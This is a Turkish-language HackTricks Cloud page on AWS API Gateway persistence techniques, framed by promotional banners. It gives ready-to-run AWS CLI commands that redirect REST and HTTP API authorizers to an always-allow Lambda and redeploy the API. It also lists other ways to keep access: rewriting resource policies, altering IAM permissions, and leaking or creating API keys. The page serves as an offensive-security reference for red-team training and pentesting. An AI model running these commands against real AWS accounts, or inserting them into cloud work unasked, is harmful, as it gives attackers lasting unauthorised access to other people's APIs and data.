AWS - API Gateway Persistence

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.

API Gateway

Daha fazla bilgi için:

AWS - API Gateway Enum

Kaynak Politikası

API gateway’lerin kaynak politikasını değiştirerek kendinize erişim verin

Lambda Authorizer’larını Değiştir

Lambda authorizer’ların kodunu değiştirerek kendinize tüm endpoints’lere erişim verin.
Veya authorizer kullanımını kaldırın.

Eğer control-plane izinlerinizle bir authorizer oluşturma/güncelleme yetkiniz varsa (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) ayrıca authorizer’ı her zaman izin veren bir Lambda’ya yönlendirebilirsiniz.

REST API’leri (değişiklikler genellikle bir dağıtım gerektirir):

REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"

HTTP APIs / apigatewayv2 (genellikle hemen geçerli olur):

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

IAM Permissions

Eğer bir kaynak IAM authorizer kullanıyorsa, IAM izinlerini değiştirerek kendinize erişim verebilirsiniz.
Ya da sadece authorizer kullanımını kaldırın.

API Keys

API keys kullanılıyorsa, persistence’i sürdürmek için onları leak edebilir veya hatta yenilerini oluşturabilirsiniz.
Ya da sadece API keys kullanımını kaldırın.

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.